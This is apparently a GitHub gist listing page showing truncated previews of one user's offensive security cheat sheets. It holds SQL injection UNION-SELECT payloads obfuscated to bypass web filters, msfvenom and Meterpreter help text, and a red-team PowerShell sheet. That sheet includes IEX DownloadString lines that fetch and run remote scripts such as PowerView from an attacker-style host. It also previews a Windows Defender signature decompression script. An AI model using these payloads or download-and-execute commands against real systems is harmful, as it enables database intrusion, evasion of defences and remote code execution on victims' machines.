ImaginaryBIT
ImaginaryBIT
/ Union Bypass List
Last active
February 3, 2020 07:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*!%55NiOn*/ /*!%53eLEct*/ | |
| %55nion(%53elect 1,2,3)-- - | |
| +union+distinct+select+ | |
| +union+distinctROW+select+ | |
| /**//*!12345UNION SELECT*//**/ | |
| /**//*!50000UNION SELECT*//**/ | |
| /**/UNION/**//*!50000SELECT*//**/ | |
| /*!50000UniON SeLeCt*/ | |
| union /*!50000%53elect*/ | |
| +#uNiOn+#sEleCt |
ImaginaryBIT
/ Msfvenom Cheatsheet
Last active
April 1, 2025 22:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MsfVenom - a Metasploit standalone payload generator. | |
| Also a replacement for msfpayload and msfencode. | |
| Usage: /usr/bin/msfvenom [options] <var=val> | |
| Options: | |
| -l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, formats, all | |
| -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom | |
| --list-options List --payload <value>'s standard, advanced and evasion options | |
| -f, --format <format> Output format (use --list formats to list) | |
| -e, --encoder <encoder> The encoder to use (use --list encoders to list) |
ImaginaryBIT
/ Meterpreter Cheatsheet
Last active
April 2, 2025 23:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| meterpreter > help | |
| Metasploit has two versions of Mimikatz available as Meterpreter extensions: | |
| version 1.0 by loading the mimikatz extension, and the newer version 2.x by loading the kiwi extension. | |
| Core Commands | |
| ============= | |
| Command Description | |
| ------- ----------- |
ImaginaryBIT
/ RedTeam_CheatSheet.ps1
Last active
October 31, 2023 22:44
— forked from m8sec/RedTeam_CheatSheet.ps1
#05. RedTeam CheatSheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # General Payload | |
| ```powershell | |
| $ExecutionContext.SessionState.LanguageMode | |
| Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe | |
| dir C:\Windows\Microsoft.Net\Framework64 | |
| Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/apple.txt"); | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/loadDLL64.txt"); | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerView.ps1"); |
ImaginaryBIT
/ ExpandDefenderSig.ps1
Created
April 15, 2019 10:03
— forked from mattifestation/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
NewerOlder